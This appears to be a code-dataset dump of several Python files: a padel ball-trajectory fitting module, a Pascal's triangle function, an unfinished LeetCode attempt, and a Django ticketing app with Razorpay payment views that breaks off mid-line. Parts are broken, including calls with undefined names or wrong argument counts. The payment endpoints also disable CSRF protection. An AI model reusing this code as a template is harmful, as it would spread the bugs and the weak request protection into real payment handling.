k+1\n respectively.\n \"\"\"\n\n if k+1 >= len(n_candidates):\n return None\n\n seed_triplets_i = []\n\n for i, candidate in enumerate(candidates[k, :n_candidates[k]]):\n for i_prev, prev_candidate in enumerate(candidates[k-1, :n_candidates[k-1]]):\n for i_next, next_candidate in enumerate(candidates[k+1, :n_candidates[k+1]]):\n if squared_distance(candidate, prev_candidate) < radius**2 and squared_distance(candidate, next_candidate) < radius**2:\n seed_triplets_i.append([i_prev, i, i_next])\n\n if len(seed_triplets_i) == 0:\n return None\n return np.asarray(seed_triplets_i)\n\n\n@jit\ndef estimate_parameters(p1: np.ndarray, p2: np.ndarray, p3: np.ndarray, dk21: int, dk32: int):\n \"\"\"Estimate parameters for a constant acceleration model (a parabola).\n The fitted model is:\n - a = 2 * (dk21 * (p3-p2) - dk32 * (p2-p1)) / (dk21 * dk32 * (dk21+dk32))\n - v1 = (p2-p1)/dk21 - dk21*a/2\n\n Parameters\n ----------\n p1 : np.ndarray\n position vector of the first point\n p2 : np.ndarray\n position vector of the second point\n p3 : np.ndarray\n position vector of the third point\n dk21 : int\n difference between the timesteps of the first and second points\n dk32 : int\n difference between the timesteps of the second and third points\n\n Returns\n -------\n v1, a: np.ndarray\n v1: velocity vector between the first and second point\n a: acceleration y\n \"\"\"\n a = 2 * (dk21 * (p3-p2) - dk32 * (p2-p1)) / (dk21 * dk32 * (dk21+dk32))\n v1 = (p2-p1)/dk21 - dk21*a/2\n return v1, a\n\n\n@jit\ndef estimate_position(pos, v, a, dk):\n return pos + dk*v + dk*dk*a/2\n\n\n@jit\ndef compute_trajectory(seed_position: np.ndarray, v: np.ndarray, a: np.ndarray, window_size: int, window_center: int = 0):\n \"\"\"Compute the estimated positions along each timestep in the window\n\n Parameters\n ----------\n seed_position : np.ndarray\n starting position\n v : np.ndarray\n velocity vector between the first and second point \n a : np.ndarray\n acceleration vector\n window_size : int\n size of the window\n window_center : int\n center of the window. If 0, the window is centered on the seed position\n\n Returns\n -------\n np.ndarray of shape(window_size, 2)\n contains all the estimated positions\n \"\"\"\n\n k0 = window_center - (window_size-1)//2\n\n positions = np.zeros((window_size, 2))\n for k in range(len(positions)):\n positions[k] = estimate_position(seed_position, v, a, k+k0)\n return positions\n\n\n@jit\ndef find_support(trajectory: np.ndarray, candidates: np.ndarray, n_candidates: np.ndarray, d_threshold: float, window_center: int):\n \"\"\"Find the support of the given trajectory\n\n Parameters\n ----------\n trajectory : np.ndarray\n trajectory of the ball\n candidates : np.ndarray, shape (:, max_candidates, 2)\n positions of the detection candidates.\n The first dimension refers to the frames,\n the second dimension to the candidate in each frame\n and the third one to the x and y components: the first element is y, the second one x.\n n_candidates : 1D np.ndarray\n number of candidates in each frame. Necessary for jit complation\n d_threshold : float\n maximum distance between the true position of the candidates and the estimated position\n in the previous iteration\n window_size : int\n window_center : int\n center of the window in frames. The center must be the seed frame.\n\n Returns\n -------\n support: np.ndarray of shape (support_size, 2)\n frame indices in (:,0) and candidate indices in (:,1)\n \"\"\"\n support_k = []\n support_i = []\n\n window_size = len(trajectory)\n k0 = window_center - (window_size-1)//2\n\n for k in range(min(window_size, len(n_candidates)-k0)):\n estimated_position = trajectory[k]\n\n candidate_idx = -1\n d2_min = d_threshold**2\n for i in range(n_candidates[k+k0]):\n d2 = squared_distance(candidates[k+k0,i], estimated_position)\n if d2= 0:\n support_k.append(k+k0)\n support_i.append(candidate_idx)\n\n support = np.zeros((len(support_k), 2), dtype=np.int32)\n support[:, 0] = support_k\n support[:, 1] = support_i\n return support\n\n\n@jit\ndef find_next_triplet(support: np.ndarray):\n \"\"\"Find the next frame triplet from the given support.\n\n Parameters\n ----------\n support: np.ndarray of shape (support_size, 2)\n frame indices in (:,0) and candidate indices in (:,1)\n\n Returns\n -------\n k_min, k_mid, k_max: int\n frame indices of the triplet\n i_min, i_mid, i_max: int\n candidate indices in their frame\n \"\"\"\n k_min, k_mid, k_max = -1, -1, -1\n i_min, i_mid, i_max = -1, -1, -1\n\n if len(support) >= 3:\n k_min = support[0,0]\n i_min = support[0,1]\n\n k_max = support[-1,0]\n i_max = support[-1,1]\n\n s_mid = find_middle_support_index(support)\n\n k_mid = support[s_mid,0]\n i_mid = support[s_mid,1]\n\n return k_min, k_mid, k_max, i_min, i_mid, i_max\n\n\n@jit\ndef trajectory_cost(trajectory: np.ndarray, candidates: np.ndarray, n_candidates: np.ndarray, d_threshold: float, window_center: int):\n window_size = len(trajectory)\n k0 = window_center - (window_size-1)//2\n\n cost = 0\n for k in range(min(window_size, len(n_candidates)-k0)):\n for i in range(n_candidates[k+k0]):\n d2 = squared_distance(trajectory[k], candidates[k+k0,i])\n d2 = min(d2, d_threshold**2)\n cost += d2\n return cost\n\n\n@jit\ndef fit_trajectories_on_seed(candidates: np.ndarray, n_candidates: np.ndarray, k_seed: int, seed_radius: float, d_threshold: float, N: int):\n \"\"\"Fit trajectories to position candidates for a seed frame.\n Seed triplets are found first, and then for each seed triplet a trajectory is iteratively fitted.\n\n Parameters\n ----------\n candidates : np.ndarray, shape (:, max_candidates, 2)\n positions of the detection candidates.\n The first dimension refers to the frames,\n the second dimension to the candidate in each frame\n and the third one to the x and y components: the first element is y, the second one x.\n n_candidates : 1D np.ndarray\n number of candidates in each frame. Necessary for jit complation\n k_seed : int\n seed frame from which to start calculating the ball trajectories.\n It is the central frame of each seed triplet.\n radius : int\n maximum distance between candidates of different frames\n to use them for a seed triplet\n d_threshold : float\n maximum distance between the true position of the candidates and the estimated position\n in the previous iteration\n N : int\n number of frames before and after to use for the trajectory fitting.\n The window size will therefore be 2*N+1\n\n Returns\n -------\n parameters : np.ndarray of shape (num_seed_triplets, 2, 2)\n the parameters of the fitted parabolic trajectories for each seed triplet.\n In the second dimension the order is: v, a\n info : np.ndarray of shape (num_seed_triplets, 10)\n Information about the candidates in the support for each seed triplet.\n The values in the second component correspond respectively to:\n - `'k_seed'`: index of the seed frame\n - `'k_min'`: index of the first frame used to fit the trajectory\n - `'k_mid'`: index of the second frame used to fit the trajectory\n - `'k_max'`: index of the third frame used to fit the trajectory\n - `'i_seed'`: index of the candidate in the seed frame\n - `'i_min'`: index of the candidate in the first frame\n - `'i_mid'`: index of the candidate in the second frame\n - `'i_max'`: index of the candidate in the third frame\n - `'n_support'`: number of support candidates\n - `'iterations'`: number of iterations before convergence\n\n trajectories : np.ndarray of shape (num_seed_triplets, 2*N+1, 2)\n fitted trajectories along the whole window\n supports: np.ndarray of shape (num_seed_triplets, support_size, 2)\n frame indices in (:,:,0) and candidate indices in (:,:,1)\n costs : np.ndarray of shape (num_seed_triplets)\n costs of each trajectory. It is computed as in equation (7) of the paper\n \"\"\"\n window_size = 2*N+1\n\n seed_triplets = find_seed_triplets(candidates, n_candidates, k_seed, radius=seed_radius)\n\n if seed_triplets is None:\n return None, None, None, None, None\n\n parameters = np.zeros((len(seed_triplets), 2, 2)) # v, a\n info = np.zeros((len(seed_triplets), 10), dtype=np.int32)\n trajectories = np.zeros((len(seed_triplets), window_size, 2), dtype=np.float32) - 1\n supports = np.zeros((len(seed_triplets), window_size, 2), dtype=np.int32) -1\n costs = np.zeros(len(seed_triplets), dtype=np.float32) + np.finfo(np.float32).max\n\n for s, seed_triplet in enumerate(seed_triplets):\n k_min, k_mid, k_max = k_seed-1, k_seed, k_seed+1\n i_min, i_mid, i_max = seed_triplet\n i_seed = i_mid\n\n cost_old = np.inf # initialize old cost to infinity\n support_old = np.array([[0]], dtype=np.int32) # initialize old support to 0\n\n v, a = estimate_parameters(candidates[k_min, i_min], candidates[k_mid, i_mid], candidates[k_max, i_max], 1, 1)\n for i in range(N):\n trajectory = compute_trajectory(candidates[k_min, i_min], v, a, window_size, k_seed-k_min) # centered around k_seed, start computing from k_min\n\n support = find_support(trajectory, candidates, n_candidates, d_threshold, k_seed)\n cost = trajectory_cost(trajectory, candidates, n_candidates, d_threshold, k_seed)\n\n if k_max == -1 or len(support) <= len(support_old) or cost > cost_old:\n trajectories[s] = trajectory\n costs[s] = cost\n parameters[s,0] = v\n parameters[s,1] = a\n supports[s, :len(support)] = support\n for j, n in enumerate([k_seed, k_min, k_mid, k_max, i_seed, i_min, i_mid, i_max, len(support), i+1]):\n info[s, j] = n\n break\n\n support_old = support\n cost_old = cost\n\n k_min, k_mid, k_max, i_min, i_mid, i_max = find_next_triplet(support)\n v, a = estimate_parameters(candidates[k_min, i_min], candidates[k_mid, i_mid], candidates[k_max, i_max], k_mid-k_min, k_max-k_mid)\n\n costs = np.where(np.isnan(costs), np.inf, costs) # turn nan costs to infinity\n return parameters, info, trajectories, supports, costs\n\n\ndef fit_trajectory(candidates: np.ndarray, n_candidates: np.ndarray, k_seed: int, seed_radius: float, d_threshold: float, N: int):\n \"\"\"Fit a parabolic trajectory to a seed frame given position candidates.\n Seed triplets are found first, and then for each seed triplet a trajectory is iteratively fitted.\n The trajectory with the lowest cost is then chosen.\n\n Parameters\n ----------\n candidates : np.ndarray, shape (:, max_candidates, 2)\n positions of the detection candidates.\n The first dimension refers to the frames,\n the second dimension to the candidate in each frame\n and the third one to the x and y components: the first element is y, the second one x.\n n_candidates : 1D np.ndarray\n number of candidates in each frame. Necessary for jit complation\n k_seed : int\n seed frame from which to start calculating the ball trajectories.\n It is the central frame of each seed triplet.\n seed_radius : float\n maximum distance between candidates of different frames\n to use them for a seed triplet\n d_threshold : float\n maximum distance between the true position of the candidates and the estimated position\n in the previous iteration\n N : int : int\n number of frames before and after to use for the trajectory fitting.\n The window size will therefore be 2*N+1\n\n Returns\n -------\n parameters : np.ndarray of shape (2, 2)\n the parameters of the fitted parabolic trajectory.\n The order is: v, a\n info : dict\n Information about the support candidates.\n The values correspond respectively to:\n - `'k_seed'`: int, index of the seed frame\n - `'k_min'`: int, index of the first frame used to fit the trajectory\n - `'k_mid'`: int, index of the second frame used to fit the trajectory\n - `'k_max'`: int, index of the third frame used to fit the trajectory\n - `'i_seed'`: int, index of the candidate in the seed frame\n - `'i_min'`: int, index of the candidate in the first frame\n - `'i_mid'`: int, index of the candidate in the second frame\n - `'i_max'`: int, index of the candidate in the third frame\n - `'iterations'`: int, number of iterations before convergence\n - `'trajectory'` : np.ndarray of shape (2*N+1, 2), fitted trajectory along the whole window\n - `'supports'`: np.ndarray of shape (support_size, 2), frame indices in (:,0) and candidate indices in (:,1)\n - `'cost'` : float, cost of the trajectory. It is computed as in equation (7) of the paper\n \"\"\"\n parameters, info, trajectories, supports, costs = fit_trajectories_on_seed(candidates, n_candidates, k_seed, seed_radius, d_threshold, N)\n\n info_dict = {'found_trajectory': False,\n 'k_seed': k_seed,\n 'seed_radius': seed_radius,\n 'd_threshold': d_threshold,\n 'N': N}\n if costs is None:\n # no seed triplets are found and therefore no trajectories\n return info_dict\n\n # filter trajectories based on acceleration\n a = parameters[:,1]\n\n # keep only accelerations with a magnitude larger than 0.2 pixels/frame^2\n # this is useful to remove trajectories due to a stuck detection\n costs = np.where(np.linalg.norm(a, axis=1) >= 0.2, costs, np.inf)\n\n # keep only points in which the vertical acceleration points towards the ground\n # i.e the y component must be positive in the image reference frame\n costs = np.where(a[:,0] >= 0, costs, np.inf)\n\n # keep only points in which the acceleration horizontal component is smaller than 4x the vertical one\n # i.e. we don't expect a lateral effect of more than 2g\n costs = np.where(np.abs(a[:,1]) <= 2*np.abs(a[:,0]), costs, np.inf)\n\n if (costs==np.inf).all():\n # edge case: all found trajectories have been filtered out\n return info_dict\n\n s = np.argmin(costs)\n\n if info[s,8] == 0:\n # edge case: no trajectory found if the support set size is 0\n return info_dict\n\n info_dict['found_trajectory'] = True\n\n for i, k in enumerate(['k_seed','k_min','k_mid','k_max','i_seed','i_min','i_mid','i_max','n_support','iterations']):\n info_dict[k] = info[s,i]\n\n info_dict['v'] = parameters[s,0]\n info_dict['a'] = parameters[s,1]\n info_dict['trajectory'] = trajectories[s]\n info_dict['support'] = supports[s, :info[s,8]]\n info_dict['cost'] = costs[s]\n\n return info_dict\n\n\ndef fit_trajectories(candidates: np.ndarray, n_candidates: np.ndarray, starting_frame: int=0, seed_radius: float=40, d_threshold: float=10, N: int=10):\n \"\"\"Fit trajectories on the given position candidates.\n\n Parameters\n ----------\n candidates : np.ndarray, shape (:, max_candidates, 2)\n positions of the detection candidates.\n The first dimension refers to the frames,\n the second dimension to the candidate in each frame\n and the third one to the x and y components: the first element is y, the second one x.\n n_candidates : 1D np.ndarray\n number of candidates in each frame. Necessary for jit complation\n starting_frame : int, optional\n index of the first frame in the video onto which the trajectory fitting is done, by default 0\n seed_radius : float, optional\n maximum distance between candidates of different frames\n to use them for a seed triplet. By default 40\n d_threshold : float, optional\n maximum distance between the true position of the candidates and the estimated position\n in the previous iteration. By default 10\n N : int : int, optional\n number of frames before and after to use for the trajectory fitting.\n The window size will therefore be 2*N+1. By default 10\n\n Returns\n -------\n fitting_info : dict\n it has 2 main entries, each of which has subentries:\n - `'parameters'` : dict\\\\\n this contains the parameters used for fitting (passed as input):\n - `'seed_radius'` : float\n - `'d_threshold'` : float\n - `'N'` : int\n - `'trajectories'` : list of dict\\\\\n each entry is a dictionary with the fitted trajectory for each frame:\n - `'found_trajectory'` : bool,\n - `'k_seed'` : int, index of the seed frame\n - `'k_min'` : int, index of the first frame used to fit the trajectory\n - `'k_mid'` : int, index of the second frame used to fit the trajectory\n - `'k_max'` : int, index of the third frame used to fit the trajectory\n - `'i_seed'` : int, index of the candidate in the seed frame\n - `'i_min'` : int, index of the candidate in the first frame\n - `'i_mid'` : int, index of the candidate in the second frame\n - `'i_max'` : int, index of the candidate in the third frame\n - `'n_support'` : int, number of support candidates\n - `'iterations'` : int, number of iterations before convergence\n - `'v'` : np.ndarray of shape `(2,)`, velocity at `k_min`\n - `'a'` : np.ndarray of shape `(2,)`, acceleration\n - `'trajectory'` : np.ndarray of shape `(2N+1, 2)`, estimated trajectory from `v` and `a`, centered on `k_seed`\n - `'support'` : np.ndarray of shape `(n_support, 2)`\n - `'cost'` : float, cost of the trajectory\n \"\"\"\n fitting_info = {'parameters': {'seed_radius': seed_radius, 'd_threshold': d_threshold, 'N': N}}\n fitting_info['trajectories'] = []\n\n print(\"Fitting trajectories:\")\n print(fitting_info['parameters'])\n for k in range(len(candidates)):\n print(f'{k+1} of {len(candidates)}', end='\\r')\n trajectory_dict = fit_trajectory(candidates, n_candidates, k, seed_radius, d_threshold, N)\n\n trajectory_dict['k_seed'] += starting_frame\n if trajectory_dict['found_trajectory']:\n for key in ['k_min', 'k_mid', 'k_max']:\n trajectory_dict[key] += starting_frame\n trajectory_dict['support'][:,0] += starting_frame\n\n for key in fitting_info['parameters'].keys():\n del trajectory_dict[key]\n\n fitting_info['trajectories'].append(trajectory_dict)\n\n print(f'{k+1} of {len(candidates)}')\n print('Done.')\n\n return fitting_info\n\n\ndef trajectories_to_json(info: dict, filename: str, indent=None):\n td = []\n for ti in info['trajectories']:\n d = {}\n for k, v in ti.items():\n if type(v) is np.ndarray:\n value = v.tolist()\n elif type(v) is np.int32:\n value = int(v)\n elif type(v) is np.float32:\n value = float(v)\n else:\n value = v\n d[k] = value\n td.append(d)\n\n d = {'parameters': info['parameters']}\n d['trajectories'] = td\n\n with open(filename, 'w') as f:\n json.dump(d, f, indent=indent)\n\n\n@jit\ndef fit_trajectories_on_seed_2(candidates: np.ndarray, n_candidates: np.ndarray, k_seed: int, seed_radius: float, d_threshold: float, N: int):\n \"\"\"Fit trajectories to position candidates for a seed frame.\n Seed triplets are found first, and then for each seed triplet a trajectory is iteratively fitted.\n Same exact algorithm as fit_trajectories, but with a clearer workflow for a clearer explanation.\n It takes an approx. 10% performance hit.\n\n Parameters\n ----------\n candidates : np.ndarray, shape (:, max_candidates, 2)\n positions of the detection candidates.\n The first dimension refers to the frames,\n the second dimension to the candidate in each frame\n and the third one to the x and y components: the first element is y, the second one x.\n n_candidates : 1D np.ndarray\n number of candidates in each frame. Necessary for jit complation\n k_seed : int\n seed frame from which to start calculating the ball trajectories.\n It is the central frame of each seed triplet.\n radius : int\n maximum distance between candidates of different frames\n to use them for a seed triplet, by default 100\n d_threshold : float\n maximum distance between the true position of the candidates and the estimated position\n in the previous iteration\n N : int\n number of frames before and after to use for the trajectory fitting.\n The window size will therefore be 2*N+1\n\n Returns\n -------\n parameters : np.ndarray of shape (num_seed_triplets, 2, 2)\n the parameters of the fitted parabolic trajectories for each seed triplet.\n In the second dimension the order is: v, a\n info : np.ndarray of shape (num_seed_triplets, 10)\n Information about the candidates in the support for each seed triplet.\n The values in the second component correspond respectively to:\n - `'k_seed'`: index of the seed frame\n - `'k_min'`: index of the first frame used to fit the trajectory\n - `'k_mid'`: index of the second frame used to fit the trajectory\n - `'k_max'`: index of the third frame used to fit the trajectory\n - `'i_seed'`: index of the candidate in the seed frame\n - `'i_min'`: index of the candidate in the first frame\n - `'i_mid'`: index of the candidate in the second frame\n - `'i_max'`: index of the candidate in the third frame\n - `'n_support'`: number of support candidates\n - `'iterations'`: number of iterations before convergence\n\n trajectories : np.ndarray of shape (num_seed_triplets, 2*N+1, 2)\n fitted trajectories along the whole window\n supports: np.ndarray of shape (num_seed_triplets, support_size, 2)\n frame indices in (:,:,0) and candidate indices in (:,:,1)\n costs : np.ndarray of shape (num_seed_triplets)\n costs of each trajectory. It is computed as in equation (7) of the paper\n \"\"\"\n window_size = 2*N+1\n\n seed_triplets = find_seed_triplets(candidates, n_candidates, k_seed, radius=seed_radius)\n\n if seed_triplets is None:\n return None, None, None, None, None\n\n parameters = np.zeros((len(seed_triplets), 2, 2)) # v, a\n info = np.zeros((len(seed_triplets), 10), dtype=np.int32)\n trajectories = np.zeros((len(seed_triplets), window_size, 2), dtype=np.float32) - 1\n supports = np.zeros((len(seed_triplets), window_size, 2), dtype=np.int32) -1\n costs = np.zeros(len(seed_triplets), dtype=np.float32) + np.finfo(np.float32).max\n\n for s, seed_triplet in enumerate(seed_triplets):\n k_min, k_mid, k_max = k_seed-1, k_seed, k_seed+1\n i_min, i_mid, i_max = seed_triplet\n i_seed = i_min\n\n v, a = estimate_parameters(candidates[k_min, i_min], candidates[k_mid, i_mid], candidates[k_max, i_max], 1, 1)\n trajectory = compute_trajectory(candidates[k_min, i_min], v, a, window_size, k_seed-k_min) # centered around k_seed, start computing from k_min\n\n support = find_support(trajectory, candidates, n_candidates, d_threshold, window_size, k_seed)\n cost = trajectory_cost(trajectory, candidates, n_candidates, d_threshold, window_size, k_seed)\n\n for i in range(N):\n k_min_next, k_mid_next, k_max_next, i_min_next, i_mid_next, i_max_next = find_next_triplet(support)\n\n v_next, a_next = estimate_parameters(candidates[k_min_next, i_min_next], candidates[k_mid_next, i_mid_next], candidates[k_max_next, i_max_next], k_mid_next-k_min_next, k_max_next-k_mid_next)\n trajectory_next = compute_trajectory(candidates[k_min_next, i_min_next], v_next, a_next, window_size, k_seed-k_min_next) # centered around k_seed, start computing from k_min\n\n support_next = find_support(trajectory_next, candidates, n_candidates, d_threshold, window_size, k_seed)\n cost_next = trajectory_cost(trajectory_next, candidates, n_candidates, d_threshold, window_size, k_seed)\n\n if k_max_next == -1 or (k_min==k_min_next and k_max==k_max_next) or cost_next > cost:\n trajectories[s] = trajectory\n costs[s] = cost\n parameters[s,0] = v\n parameters[s,1] = a\n supports[s, :len(support)] = support\n for j, measurement in enumerate([k_seed, k_min, k_mid, k_max, i_seed, i_min, i_mid, i_max, len(support), i+1]):\n info[s, j] = measurement\n break\n\n v, a = v_next, a_next\n trajectory = trajectory_next\n support = support_next\n cost = cost_next\n k_min, k_mid, k_max, i_min, i_mid, i_max = k_min_next, k_mid_next, k_max_next, i_min_next, i_mid_next, i_max_next\n\n\n costs = np.where(np.isnan(costs), np.inf, costs) # turn nan costs to infinity\n return parameters, info, trajectories, supports, costs\n","repo_name":"michele98/ball_tracking_padel","sub_path":"trajectories/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":26954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"70363042775","text":"#!/usr/bin/python3\n\"\"\"\nModule 14-pascal_triangle\nContains function that returns int lists of pascal triangle of any given size\n\"\"\"\n\n\ndef pascal_triangle(n):\n \"\"\"\n Return:\n empty list [] if n <= 0\n if n is 7, we should expect:\n [1]\n [1, 1]\n [1, 2, 1]\n [1, 3, 3, 1]\n [1, 4, 6, 4, 1]\n [1, 5, 10, 10, 5, 1]\n [1, 6, 15, 20, 15, 6, 1]\n \"\"\"\n if n <= 0:\n return []\n if n == 1:\n return [[1]]\n\n triangle = [[1]]\n for rows in range(n-1):\n triangle.append([a+b for a, b\n in zip([0] + triangle[-1], triangle[-1] + [0])])\n return triangle\n","repo_name":"jubrealguy/alx-higher_level_programming","sub_path":"0x0B-python-input_output/12-pascal_triangle.py","file_name":"12-pascal_triangle.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"29172575565","text":"\nfrom scipy.special import comb, perm\n\nclass Solution:\n def getProbability(self, balls):\n K = len(balls)\n N = sum(balls)\n dps = [[[-1] * (N // 2) for j in range(K)] for i in range(N//2+1)]\n \n def func(n, k, t):\n if k >= K:\n return 1 if t == 0 and n == 0 else 0\n if dps[n][k][t] > -1:\n return dps[n][k][t]\n if k < t:\n dps[n][k][t] = 0\n return dps[n][k][t]\n prob = 0\n for c in range(min(grid[k], n, t)+1):\n prob += comb(grid[k], c) / 2 ** grid[k] * func(n-c, k+1, t-(c>=0), nt-c)\n \n func(N//2, 0, )","repo_name":"Guardian44x/Algorithm-Problems","sub_path":"LeetCode/5427.py","file_name":"5427.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36404094560","text":"import mimetypes\nfrom django.views import generic\nfrom django.shortcuts import redirect, render\nfrom .models import *\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nimport razorpay\nfrom django.conf import settings\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponseBadRequest\nfrom localStoragePy import localStoragePy\nimport json\nfrom django.core.mail import send_mail, EmailMessage\nfrom static.pypdf import test\nimport os\nimport random\nimport string\nfrom django.utils import timezone\nfrom .systemconfig import *\nfrom qrcode import *\nfrom .qrcoded import *\nimport smtplib\nfrom urllib.parse import urlparse,parse_qs \nfrom .fusioncharts import FusionCharts\nfrom wsgiref.util import FileWrapper\nimport time\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\n\n\nrazorpay_client = razorpay.Client(\n auth=(get_razor_key_id(), get_razor_key_secret()))\n\n\n@csrf_exempt\ndef event_detail(request):\n if request.method == 'POST':\n event_id = request.POST.get('event_id')\n event = Event.objects.get(event_id=event_id)\n date_diff = event.Event_to - event.Event_from\n response_data = {\n 'event_id': event.event_id,\n 'event_name': event.name,\n 'event_from': event.Event_from.strftime(\"%Y-%m-%d\"),\n 'event_to': event.Event_to.strftime(\"%Y-%m-%d\"),\n 'date_diff': date_diff.days\n }\n return JsonResponse(response_data)\n else:\n return JsonResponse({'error': 'Invalid request method'})\n\ndef TicketsView(request):\n return render(request, 'frontend/tickets.html')\n\n\n@csrf_exempt\ndef PaymentView(request):\n start = time.time()\n\n def verify_signature(response_data):\n client = razorpay.Client(\n auth=(get_razor_key_id(), get_razor_key_secret()))\n return client.utility.verify_payment_signature(response_data)\n\n if \"razorpay_signature\" in request.POST:\n payment_id = request.POST.get(\"razorpay_payment_id\", \"\")\n provider_order_id = request.POST.get(\"razorpay_order_id\", \"\")\n signature_id = request.POST.get(\"razorpay_signature\", \"\")\n order = Order.objects.get(provider_order_id=provider_order_id)\n order.payment_id = payment_id\n order.signature_id = signature_id\n order.save()\n if order.ticket_type == 'BASE':\n ticket = Tickets.objects.filter(event_id=order.event_id).order_by('ticket_type')[0]\n event_ticket_remaining = Tickets.objects.filter(event_id=order.event_id).values('ticket_count').order_by(\"ticket_type\")[0]['ticket_count']\n ticket.ticket_count = event_ticket_remaining - order.ticket_count\n elif order.ticket_type == 'VIP':\n ticket = Tickets.objects.filter(event_id=order.event_id).order_by('ticket_type')[1]\n event_ticket_remaining = Tickets.objects.filter(event_id=order.event_id).values('ticket_count').order_by(\"ticket_type\")[1]['ticket_count']\n ticket.ticket_count = event_ticket_remaining - order.ticket_count\n\n ticket.save()\n # tickets.ticket_count = event_ticket_remaining[0]['ticket_count'] - 1\n print(order)\n if verify_signature({\n \"razorpay_payment_id\": payment_id,\n \"razorpay_order_id\": provider_order_id,\n \"razorpay_signature\": signature_id,\n }):\n order.status = PaymentStatus.SUCCESS\n event_location = EventLocation.objects.get(location_id=order.event_id)\n event = Event.objects.get(event_id=order.event_id)\n\n start_date = event.Event_from\n end_date = event.Event_to\n\n event.remain_tickets = event.remain_tickets - order.ticket_count\n print(\"............\",event.total_count,order.ticket_count)\n event.save()\n order.location_link = event_location.location_link\n order.save()\n temp_hash= generate_hash(order)\n temp_generate_url = generate_url(temp_hash)\n invoive_qrcode(temp_generate_url,order)\n order.save_hash = temp_hash\n order.save_url = temp_generate_url\n order.save()\n print(order)\n cvt_start = time.time()\n test.convert_to_pdf(order,get_host_companyName(request),event_location,event)\n cvt_end = time.time()\n print(\"converter\",cvt_end-cvt_start)\n\n mail_start = time.time()\n Mail_send(order,str(get_host_email()),order.email,str(get_host_password()))\n mail_end = time.time()\n print(\"mail\",mail_end-mail_start)\n end = time.time()\n print(\"full function\",end - start)\n return render(request, \"frontend/sucess.html\", context={\"status\": order.status})\n \n \n else:\n order.status = PaymentStatus.FAILURE\n order.save()\n return render(request, \"frontend/fauiler.html\", context={\"status\": order.status})\n else:\n if request.POST.get(\"error[metadata]\"):\n payment_id = json.loads(request.POST.get(\n \"error[metadata]\")).get(\"payment_id\")\n provider_order_id = json.loads(request.POST.get(\"error[metadata]\")).get(\n \"order_id\"\n )\n order = Order.objects.get(provider_order_id=provider_order_id)\n order.payment_id = payment_id\n order.status = PaymentStatus.FAILURE\n order.save()\n return render(request, \"frontend/payment.html\", context={\"status\": order.status})\n else:\n return render(request, \"frontend/sucess.html\")\n\n # if request.method == \"POST\":\n # try:\n\n # # get the required parameters from post request.\n # payment_id = request.POST.get('razorpay_payment_id', '')\n # razorpay_order_id = request.POST.get('razorpay_order_id', '')\n # signature = request.POST.get('razorpay_signature', '')\n # params_dict = {\n # 'razorpay_order_id': razorpay_order_id,\n # 'razorpay_payment_id': payment_id,\n # 'razorpay_signature': signature\n # }\n\n # # verify the payment signature.\n # result = razorpay_client.utility.verify_payment_signature(\n # params_dict)\n # print(\",,,,,,,,,,,,,,,\",result)\n # if result is not None:\n # amount = 2000 # Rs. 200\n # try:\n # # capture the payemt\n # razorpay_client.payment.capture(payment_id, amount)\n\n # # render success page on successful caputre of payment\n # return render(request, 'paymentsuccess.html')\n # except:\n\n # # if there is an error while capturing payment.\n # return render(request, 'paymentfail.html')\n # else:\n\n # # if signature verification fails.\n # return render(request, 'paymentfail.html')\n # except:\n\n # # if we don't find the required parameters in POST data\n # return HttpResponseBadRequest()\n # else:\n # # if other than POST request is made.\n # return HttpResponseBadRequest()\n\n\ndef IndexView(request):\n event_location = EventLocation.objects.all()\n current_date = timezone.now().date()\n event_item = Event.objects.filter(Event_to__gt=current_date, is_deleted=False)\n event_item = Event.objects.all()\n \n context = {\n 'event_location': event_location,\n 'event_item': event_item,\n 'today': current_date,\n\n }\n return render(request, 'frontend/index.html', context)\n\n\ndef popup_data(request, id):\n event_location = EventLocation.objects.all()\n event_item = Event.objects.all()\n tickets_item = Tickets.objects.filter(event_id=id)\n context = {\n 'event_location': list(event_location.values()),\n 'event_item': list(event_item.values()),\n 'tickets_item': list(tickets_item.values().order_by('ticket_type')),\n }\n return JsonResponse(context)\n\n\nclass EmployeeView(generic.ListView):\n template_name = 'employee/employee.html'\n\n def get_queryset(self):\n return None\n\n\nclass CatagoryView(generic.ListView):\n template_name = 'event_catagory/catagory.html'\n\n def get_queryset(self):\n return None\n\n\nclass EventView(generic.ListView):\n template_name = 'event/event.html'\n\n def get_queryset(self):\n return None\n\n\nclass Eventlocation(generic.ListView):\n template_name = 'event_location/event_location.html'\n\n def get_queryset(self):\n return None\n\n\nclass Eventransaction(generic.ListView):\n template_name = 'transactions/transactions.html'\n\n def get_queryset(self):\n return None\n\n\nclass ClientView(generic.ListView):\n template_name = 'client/client.html'\n\n def get_queryset(self):\n return None\n\n\nclass EmployeeDashboardView(generic.ListView):\n template_name = 'employee/employee_dashboard.html'\n\n def get_queryset(self):\n return None\n\n\nclass ClientDashboardView(generic.ListView):\n template_name = 'client/client_dashboard.html'\n\n def get_queryset(self):\n return None\n\n\nclass TransactionsDashboardView(generic.ListView):\n template_name = 'transactions/transactions_dashboard.html'\n\n def get_queryset(self):\n return None\n\n\nclass EventDashboardView(generic.ListView):\n template_name = 'event/event_dashboard.html'\n\n def get_queryset(self):\n return None\n\n\nclass EventCatagoryView(generic.ListView):\n template_name = 'event_catagory/catagory_dashboard.html'\n\n def get_queryset(self):\n return None\n\n@csrf_exempt\ndef Razorpay(request):\n \n event_dates = request.POST.get('event_dates')\n event_name = request.POST.get('event_name')\n ticket_count = request.POST.get('ticket_count')\n ticket_type = request.POST.get('ticket_type')\n payment_event_id = request.POST.get('event_id')\n amount = int(request.POST.get('total'))\n total_amount = (amount * 0.18) + amount\n user_email = request.POST.get('email')\n user_phone = request.POST.get('phone')\n user_name = request.POST.get('user_name')\n event_id = request.POST.get('event_id')\n event_From = event_dates\n # event_From = Event.objects.get(event_id=payment_event_id)\n # event_From = event_From.Event_from.strftime('%Y-%m-%d %H:%M:%S')\n\n order_currency = 'INR'\n razorpay_order = 